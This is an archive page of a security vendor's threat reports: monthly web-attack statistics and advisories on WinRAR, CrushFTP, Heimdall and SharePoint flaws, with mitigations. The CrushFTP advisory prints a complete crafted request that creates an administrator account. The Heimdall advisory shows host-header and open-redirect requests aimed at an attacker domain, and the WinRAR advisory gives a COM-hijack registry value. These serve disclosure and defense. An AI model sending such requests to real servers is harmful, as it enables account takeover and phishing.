Threat Intelligence Report Archives | SECaaS Platform AIONCLOUD

[2025.08] Web Attack Trend Report

[August 2025 Web Attack Trend Analysis] 1. Weekly Web Attack Trend Analysis By analyzing weekly web attack trends, it is possible to identify specific periods when web attacks were concentrated. Based on this, the findings can be used to establish proactive prevention and response strategies for periods with frequent attacks. The graph below visualizes the number of web attacks detected by AIWAF on a weekly basis during August 2025. An analysis of the data detected by AIWAF during August 2025 revealed that an average of over 350,000 web attacks were detected per day. This figure represents a noticeable upward trend compared to the previous month, demonstrating that threats targeting web servers continue to evolve in sophistication. In addition, the frequency of attacks was higher on weekends (Saturday and Sunday) compared to weekdays, which can be interpreted as a strategic approach that exploits the reduced usage of web servers during non-business hours. In particular, August 2 recorded the highest concentration of web attacks during the entire period, with SQL Injection accounting for the largest share among the detected attack types on that day. SQL Injection is a representative attack technique used to manipulate databases in order to steal system privileges or leak internal information. Attackers typically employ this method to bypass authentication procedures or to analyze database structures. Due to these characteristics, special attention is required to protect sensitive corporate information. In fact, within AIWAF, SQL Injection is classified as a high-risk attack type with the largest number of detection patterns configured. These findings highlight the need for continuous vigilance and precise response strategies against major web attack types, including SQL Injection. They also serve as an important reference for the establishment of future detection and prevention policies. 2. Web Attack Trends by Attack Type By analyzing web attack trends by attack type based on detection logs, it is possible to systematically identify which types of attacks occurred most frequently during the month. Such analysis goes beyond simple statistics and serves as a key foundation for developing organizational security policies and concretizing response frameworks. An analysis of detection logs collected by AIWAF during August 2025 revealed that various types of web attacks were detected. Among them, some attack types showed distinct patterns, such as concentrated occurrences during specific periods or accounting for a significant proportion of the total number of attacks. In particular, classic yet still highly threatening attack types such as SQL Injection and System File Access ranked among the top. These attacks are typically carried out repeatedly, mainly through automated attack tools or botnets. The graph below visualizes the distribution of web attack types detected by AIWAF in August 2025. According to the statistics of web attack types detected by AIWAF during August 2025, SQL Injection accounted for 37.29% of total detections, the highest proportion. This was followed by System File Access (14.65%), Default Page (13.65%), and App Weak (10.58%). These results indicate the need for more precise countermeasures and proactive preventive actions for specific attack types. First, SQL Injection is a highly critical attack type that consistently ranks near the top of the OWASP Top 10, and its techniques continue to evolve in diverse ways. This attack typically occurs when values supplied via user input are incorporated directly into SQL queries and executed. Attackers exploit this to perform abnormal authentication bypass, enumerate database structures, and steal sensitive data. Systems that use dynamic queries or lack sufficient input validation are particularly vulnerable to such attacks. The second most prevalent type, System File Access (14.65%), refers to attempts by attackers to exploit vulnerabilities in web applications to gain unauthorized access to internal system files and directories or manipulate arbitrary files. These attacks can result from web server misconfigurations, insufficient access controls, or failures in directory path validation. If successful, they may lead to privilege escalation or the installation of backdoors. The third type, Default Page (13.65%), targets pages left with default settings after installation or system message pages. Such pages often expose information that reveals the type and configuration state of the system software during the reconnaissance phase, which can then be leveraged for subsequent attacks. Although generally passive in nature, this attack type is often widely scanned using automated tools, making early detection and response essential. The fourth type, App Weakness (10.58%), exploits inherent security flaws in applications such as weak authentication, session management vulnerabilities, or configuration errors. Notably, there has been an increase in cases detected as authentication bypass attempts and API abuse within cloud-based SaaS systems and API-driven services. Such trends may significantly influence the development of future cloud security policies.     The Web Attack Trend Report provides the latest web vulnerability analyses, industry-specific attack patterns, and key CVE-based vulnerability information, all based on processed data from the Read more about [2025.08] Web Attack Trend Report[…]

[2025.09 Vulnerability Report] CVE-2025-8088 in the Wild: LNK Dropper to COM Hijacking Attack Chain

CVE-2025-8088 is a vulnerability in WinRAR for Windows that arises from incomplete path normalization/validation during extraction. Under certain conditions an archive entry (for example, using Alternate Data Streams, ADS) can be crafted to bypass the intended extraction path and create files outside the target directory — including auto-start locations such as the Startup folder. An adversary can leverage this to plant files that execute at logon, enabling code execution and persistence. 1. Overview Disclosed in August 2025, CVE-2025-8088 is a vulnerability in WinRAR for Windows. Because path normalization/validation during extraction is incomplete, an attacker-supplied archive can cause files to be created outside the intended extraction directory (including parent directories). An attacker can exploit this behavior to place files in autorun locations (e.g., the Startup folder), causing automatic execution upon user logon (resulting in remote code execution). 2. Affected Versions Affected product: WinRAR for Windows versions up to and including 7.12 Trigger conditions: Occurs when a user extracts an attacker-crafted RAR archive with WinRAR and then manually executes files from the extracted contents (or when extraction itself writes to unintended locations). Impact: The attacker can place batch files, LNK shortcuts, executables, or scripts into locations such as %APPDATA%\…\Startup. If such files are placed in a startup location, they may execute automatically after reboot or on next logon. 3. Root Cause Analysis of PoC-created file stream data shows the following structure (summary): The archive contains multiple streams. Block[1] holds the packed file data. The vulnerability arises from Block[2], which contains NTFS-related metadata streams. Block[2] can include filename/path metadata, timestamps, and other NTFS stream information required for restoring NTFS streams. The flaw occurs in how WinRAR interprets the path/stream information in Block[2]. Background (ADS & NTFS): NTFS supports multiple data streams per file. An Alternate Data Stream (ADS) is a named $DATA attribute and can be referenced as filename:streamname. For example, example.pdf:hidden.bin is interpreted as a hidden associated data stream of example.pdf. Windows uses ADS in some security mechanisms — e.g., Mark of the Web (MoTW). Files downloaded from the Internet are often given an ADS like filename:Zone.Identifier:$DATA (e.g., test.exe:Zone.Identifier) which supplies a ZoneID (e.g., ZoneID = 3) that influences Protected View / SmartScreen behavior. How the vulnerability is triggered: The attacker crafts NTFS metadata inside the RAR (Block[2]) that includes a filename:streamname style entry combined with path traversal elements such as ..\. When WinRAR processes this metadata during extraction, the colon (:) is interpreted by Windows as an ADS separator. The attacker’s path elements then become involved in the normalization process and can cause writes outside the extraction folder when passed to the Windows file creation API (CreateFileW). Debugging a PoC shows that the decoy.txt:streamname syntax is manipulated so that the stream portion is replaced by path traversal elements (e.g., ..\..\..\…). This string ends up being passed directly to CreateFileW as its first parameter; the colon is handled as an ADS delimiter by Windows and the crafted path components interfere with normalization, causing Windows to create files outside the intended directory. 4. Real-world Attack Example Threat actor groups (RomCom / Storm-0978 / Tropical Scorpius / UNC2596 — linked to Russia) discovered and began exploiting CVE-2025-8088 in the wild. A representative attack flow observed: Source: https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/ When the malicious RAR is extracted, the archive drops Update.lnk and msedge.dll into attacker-controlled target locations (for example, into %TEMP% or Startup). When Update.lnk is executed, it modifies registry values to perform COM hijacking: HKCU\Software\Classes\CLSID\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\InprocServer32 = “%temp%\msedge.dll” That CLSID is mapped to the npmproxy.dll (Network List Manager proxy/stub DLL) PSFactoryBuffer object. Because the attacker registered msedge.dll for that CLSID, when the COM runtime resolves the CLSID it loads the attacker-provided msedge.dll instead of the expected npmproxy.dll. As a result, the attacker’s DLL runs and carries out malicious actions. (Reference flow diagram and PoC analyses have shown this chain.) Source referenced: ESET / WeLiveSecurity report on the campaign. 5. Mitigation Immediate action: Update WinRAR to 7.13 or later as soon as possible. Operational controls: Inspect and remediate endpoints and servers where suspicious RAR files may have been extracted. Mail and gateway controls: For mail and cross-network transfer paths, quarantine or pre-scan RAR attachments (sandboxing / AV / detonation) before allowing users to extract or execute archived content. 6. Conclusion CVE-2025-8088 is a WinRAR directory-traversal/ADS abuse vulnerability that enables extraction to arbitrary paths (including autorun/startup locations). Attackers can exploit this to drop files that execute automatically (persistence and code execution). The vulnerability has been actively used in real-world campaigns and is listed on CISA/KEV, so rapid remediation is recommended. 7. References https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/ https://www.seqrite.com/ko/blog/winrar-directory-traversal-ntfs-ads-vulnerabilities-cve-2025-6218-cve-2025-8088/ https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool

[2025.09 Vulnerability Report] CrushFTP Authentication Bypass

This vulnerability is an authentication bypass in CrushFTP. An attacker can bypass authentication and create an administrator account by sending a request containing a crafted AS2-TO header and a separate administrator-account-creation request in a short time interval. A patch for this vulnerability was released on July 18, 2025. Our AIWAF product will address this issue with the “CrushFTP Authentication Bypass” pattern, which is planned for inclusion in the September 2025 pattern update. 1. Overview CrushFTP is a cross-platform file-transfer server that supports FTP, SFTP, HTTP/S, WebDAV, and other protocols. It is used by individuals and organizations of various sizes. This report summarizes analysis of the recent authentication-bypass vulnerability CVE-2025-54309 discovered in the product. Source : https://www.crushftp.com/index.html 2. Attack Type CVE-2025-54309 was disclosed when CrushFTP released a patch in July 2025 and was promptly added to lists of vulnerabilities with observed exploitation. This vulnerability is a race-condition–based authentication bypass that abuses weak AS2 protocol validation logic used by the server. An attacker manipulates the AS2-TO header value in requests sent to the server to \crushadmin, which can cause privilege elevation to an internal administrator account. A single crafted request alone does not enable immediate misuse of elevated privileges. However, if the attacker quickly follows that request with a separate administrator-account-creation request, the two requests can race such that the account-creation operation executes under the elevated (built-in administrator) context — resulting in creation of an administrative account. Example attack request: POST /WebInterface/function/ HTTP/1.1 Host: www.test.com User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive AS2-TO: \crushadmin Content-Type: disposition-notification X-Requested-With: XMLHttpRequest Cookie: CrushAuth=1755628505894_6BIIu82Vk0lI9naqUFa0zdjXuOZgDeQ5; currentAuth=DeQ5 Content-Length: 785 command=setUserItem&data_action=new&serverGroup=MainUsers&username=testing_hacker&user=<?xml version=”1.0″ encoding=”UTF-8″?><user type=”properties”><max_logins_ip>8</max_logins_ip><real_path_to_user>./users/MainUsers/crushadmin/</real_path_to_user><root_dir>/</root_dir><user_name>CENSORED</user_name><version>1.0</version><max_logins>0</max_logins><last_logins>03/28/2025 03:00:26 PM</last_logins><password>NEWPASSWORD</password><site>(CONNECT)(WEB_ADMIN)</site><ignore_max_logins>true</ignore_max_logins><max_idle_time>0</max_idle_time><username>CENSORED</username></user>&xmlItem=user&vfs_items=<?xml version=”1.0″ encoding=”UTF-8″?><vfs type=”vector”></vfs>&permissions=<?xml version=”1.0″ encoding=”UTF-8″?><VFS type=”properties”><item name=”/”>(read)(view)(resume)</item></VFS>&c2f=DeQ5 3. Mitigation Measures CrushFTP released a patch for CVE-2025-54309 on July 18, 2025. According to researchers who analyzed the vulnerability, it was actively exploited prior to the patch publication; some analysts have commented that the patch was released late relative to observed abuse. If you operate CrushFTP, confirm your version and upgrade to 10.8.5, 11.3.4_23, or later as applicable. Our AIWAF product will mitigate this vulnerability via the “CrushFTP Authentication Bypass” pattern planned for the September 2025 pattern update. Source : https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025 4. Conclusion CrushFTP is a cross-platform file-transfer server used by individuals, SMBs, and some larger organizations. CVE-2025-54309 has known exploitation cases and active attack attempts; therefore, customers using this product should promptly apply the available updates and move to patched versions. Our Threat Analysis (TA) team continues to monitor vulnerabilities affecting CrushFTP and will respond rapidly to new related findings. 5. References https://nvd.nist.gov/vuln/detail/CVE-2025-54309 https://labs.watchtowr.com/the-one-where-we-just-steal-the-vulnerabilities-crushftp-cve-2025-54309/

[2025.09 Vulnerability Report] Host Header Injection & Open Redirect in Heimdall Application (CVE-2025-50578)

Heimdall Dashboard is a widely used web application hub for personal and small-server environments. A recently discovered vulnerability (CVE-2025-50578) stems from improper handling of HTTP headers in the service, enabling host-header injection and open-redirect attacks. This vulnerability is especially dangerous because it can be exploited by unauthenticated remote attackers and may already have been used in active attacks. All Heimdall users should immediately update to the latest version to mitigate potential data leakage and phishing risks. Our Threat Analysis (TA) team is monitoring Heimdall web application vulnerabilities and will respond promptly to any new product issues. 1. Overview Heimdall helps users centralize links to various services (e.g., Plex, Sonarr, Radarr, Nextcloud) running in Docker containers or on home networks, providing convenient access and management. This report summarizes analysis of CVE-2025-50578, a vulnerability found in the product. Source : https://heimdall.site/   2. Attack Type This vulnerability is caused by insufficient validation of HTTP request headers. An attacker can send a crafted X-Forwarded-Host or Referer header to induce Heimdall to perform malicious behaviors such as: Host Header Injection: When the application constructs internal links, resource URLs, or HTML content, an attacker-controlled domain (e.g., attacker.example) may be referenced. For example, email verification links or post-login redirect URLs generated by Heimdall could include the attacker’s domain. Example crafted request (host header injection): GET /login HTTP/1.1 Host: your-legitimate-heimdall.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close X-Forwarded-Host: malicious-attacker.com Open Redirect: If the application uses the Referer header to return a user to their previous page, an attacker can insert a malicious URL in this header to force a redirect to an arbitrary site. Example crafted request (open redirect): “` GET /settings HTTP/1.1 Host: your-legitimate-heimdall.com User-Agent: Mozilla/5.0 Accept-Language: en-US,en;q=0.5 Connection: close Referer: https://malicious-attacker.com/ 3. Mitigation LinuxServer.io has released a security patch to address CVE-2025-50578. Because this vulnerability is likely being actively exploited, Heimdall users must upgrade immediately. The fixed versions are 2.6.3-ls308 and later. If you use a Heimdall container, update to the latest image (e.g., linuxserver/heimdall:latest) or change any pinned version tags to 2.6.3-ls308 or newer. Our AIWAF product team is currently performing further analysis on this vulnerability and plans to include protections in an upcoming pattern update. 4. Conclusion Heimdall Dashboard is widely used in personal and small-server environments. CVE-2025-50578 arises from improper HTTP header handling and makes Heimdall vulnerable to host-header injection and open-redirect attacks. Because unauthenticated remote attackers can exploit this flaw, and given the possibility of active abuse, all Heimdall users should update to the latest version immediately to prevent data leakage and phishing threats. Our TA team will continue to monitor Heimdall and respond swiftly to any newly discovered vulnerabilities. 5. References https://nvd.nist.gov/vuln/detail/CVE-2025-50578 https://github.com/linuxserver/Heimdall/issues/1451 https://medium.com/@juanfelipeoz.rar/cve-2025-50578-exploiting-host-header-injection-open-redirect-in-heimdall-application-733afceff2ea

[2025.07] Web Attack Trend Report

[July 2025 Web Attack Trend Analysis] 1. Weekly Web Attack Trend Analysis Through weekly web attack trend analysis, it is possible to identify specific periods when web attacks were concentrated. Based on this, it can be utilized to establish proactive prevention and response strategies for periods with frequent attacks. The graph below visualizes the number of web attacks detected by AIWAF on a weekly basis during July 2025. An analysis of data detected by AIWAF during July 2025 revealed that an average of over 270,000 web attacks per day were detected. This figure shows a slight upward trend compared to the previous month, indicating that threats targeting web servers are continuously evolving. In addition, the frequency of attacks was higher on weekends (Saturday and Sunday) than on weekdays, which can be interpreted as a strategic approach aimed at exploiting reduced web server usage during non-business hours. In particular, July 9 recorded the highest concentration of web attacks during the entire period. Among the attack types detected on that day, SQL Injection accounted for the largest proportion. SQL Injection is a representative attack technique that manipulates databases to steal system privileges or leak internal information. Attackers typically use this method to bypass user authentication processes or to identify database structures. Due to these characteristics, special attention is required to protect sensitive corporate information. In fact, within AIWAF, SQL Injection is classified as a high-risk attack type with the largest number of detection patterns configured. These findings highlight the need for continuous attention and precise response strategies against major web attack types, including SQL Injection. They will also serve as important reference data for establishing future detection and prevention policies. 2. Web Attack Trends by Attack Type By analyzing web attack trends by attack type based on detection logs, it is possible to systematically identify which types of attacks occurred most frequently during the month. Such analysis goes beyond simple statistics and serves as a key foundation for establishing organizational security policies and concretizing response frameworks. An analysis of detection logs collected by AIWAF during July 2025 revealed that various types of web attacks were detected. Among them, some attack types showed distinct patterns, such as concentrated occurrences during specific periods or accounting for a significant proportion of the total number of attacks. In particular, classic yet still highly threatening attack types—such as SQL Injection and System File Access—ranked among the top. These attacks tend to be repeatedly executed, primarily through automated attack tools or botnets. The graph below visualizes the distribution of web attack types detected by AIWAF in July 2025.     The Web Attack Trend Report provides the latest web vulnerability analyses, industry-specific attack patterns, and key CVE-based vulnerability information, all based on processed data from the AI/ML-powered threat Read more about [2025.07] Web Attack Trend Report[…]

[2025.08 Vulnerability Report] Microsoft SharePoint RCE Chain: ToolShell

This vulnerability is an authentication bypass and insecure deserialization flaw in Microsoft SharePoint Server. An attacker could bypass authentication and execute malicious code by sending a crafted Referer header and serialized XML data to the ToolPane.aspx page. This issue was patched in the July security update for Microsoft SharePoint Server, and our AIWAF product will Read more about [2025.08 Vulnerability Report] Microsoft SharePoint RCE Chain: ToolShell[…]

[2025.08 Vulnerability Report] Gong Da & CKVIP Exploit Kit: toGMTString() Abuse Analysis

Gong Da and CKVIP Exploit Kits were web-based attack tools active in East Asia between 2015 and 2018, exploiting browser vulnerabilities and cookie manipulation based on toGMTString() to enable reinfection and data theft when users revisited compromised websites. Malicious landing pages contained the code snippet expires=” + expires.toGMTString(), which was designed to evade detection by mimicking legitimate code, but later became a well-known indicator of compromise (IoC) identified by various security solutions. 1. Overview The Gong Da and CKVIP Exploit Kits were web-based attack Read more about [2025.08 Vulnerability Report] Gong Da & CKVIP Exploit Kit: toGMTString() Abuse Analysis[…]

[2025.08 Vulnerability Report] Kimsuky Group’s Use of GitHub C2 in Targeted Attacks Against Foreign Embassies in South Korea

North Korean-linked hackers conducted espionage operations for several months this spring, targeting diplomatic missions and abusing GitHub to distribute malware and covertly control infected systems. Another North Korean-run organization was also found to have infiltrated more than 320 companies worldwide by impersonating remote IT staff. Spear-phishing emails were sent to diplomatic missions and Ministry of Read more about [2025.08 Vulnerability Report] Kimsuky Group’s Use of GitHub C2 in Targeted Attacks Against Foreign Embassies in South Korea[…]

[2025.08 Vulnerability Report] Pterodactyl Panel Unauthenticated Remote Code Execution (CVE-2025-49132)

CVE-2025-49132 is a critical RCE vulnerability that allows information disclosure or code execution within the Pterodactyl Panel server without authentication. Attackers can steal configurations or take control of the server, making prompt patching extremely important. Our AIWAF product is developing detection patterns to address vulnerabilities identified within Pterodactyl and will continue to respond quickly to newly discovered vulnerabilities. 1. Overview Pterodactyl Panel is an open-source game server management panel designed to allow users to easily deploy and manage various game servers in a web-based environment. The panel leverages Docker and container-based architecture to ensure scalability and stability, while providing intuitive UI and fine-grained access control in multi-user environments. In both enterprise and community contexts, it is widely used for multi-game server operations, hosting automation, user management, and resource monitoring. This report summarizes the analysis of the recently identified unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2025-49132), discovered in versions prior to Pterodactyl Panel v1.11.11. Source : https://pterodactyl.io/ 2. Attack Type CVE-2025-49132 is a Remote Code Execution (RCE) vulnerability discovered in versions of Pterodactyl Panel prior to v1.11.11. The root cause of this vulnerability lies in authentication bypass and insufficient Read more about [2025.08 Vulnerability Report] Pterodactyl Panel Unauthenticated Remote Code Execution (CVE-2025-49132)[…]

[2025.06] Web Attack Trend Report

[June 2025 Web Attack Trend Analysis] 1. Weekly Web Attack Trend Analysis Weekly web attack trend analysis allows us to identify periods when web attacks were concentrated at specific points in time. Based on this, we can establish preventive and response strategies in advance to prepare for periods when attacks are frequent. The graph below visualizes the number of web attacks detected by AIWAF on a weekly basis during the month of June 2025. An analysis of data detected by AIWAF during the month of June 2025 revealed that an average of approximately 290,000 web attacks were detected per day. This figure shows a significant increase compared to the previous month, indicating that threats to web servers are becoming increasingly sophisticated. In addition, the frequency of attacks was higher on weekends (Saturday and Sunday) than on weekdays, which can be interpreted as a strategic approach targeting lower web server usage outside of business hours. In particular, June 2 was the day with the highest concentration of web attacks during the entire period, and SQL injection accounted for the highest proportion of attack types detected on that date. SQL Injection is a representative attack method that can be used to manipulate databases to steal system privileges or leak internal information. Attackers typically use this technique to bypass user authentication procedures or to understand database structures, and due to these characteristics, special attention is required to protect sensitive corporate information. In fact, AIWAF classifies SQL Injection as a high-risk attack type with the most detection patterns set. These analysis results highlight the need for ongoing attention and precise response strategies for major web attack types, including SQL Injection, and will serve as important reference material for establishing detection and blocking policies in the future. 2. Web Attack Trends by Attack Type By analyzing web attack trends by attack type based on detection logs, you can systematically identify which types of attacks occurred frequently over a month. Such analysis goes beyond simple statistics and serves as a key benchmark for establishing security policies and response systems for organizations. An analysis of detection logs collected by AIWAF over the month of June 2025 revealed various types of web attacks, some of which exhibited distinct patterns, such as concentrated occurrences during specific periods or a high proportion of total attack incidents. Notably, classic yet still threatening attack types such as SQL Injection and System File Access were prevalent, and these attacks are often carried out repeatedly using automated attack tools or botnets. The graph below visualizes the distribution of web attack types detected by AIWAF as of June 2025.     The Web Attack Trend Report provides the latest web vulnerability analyses, industry-specific attack patterns, and key CVE-based vulnerability information, all based on processed data from the AI/ML-powered threat intelligence platform AILabs. Subscribe to receive the full monthly Web Attack Trend Report! [ Read more about [2025.06] Web Attack Trend Report[…]

Scroll Up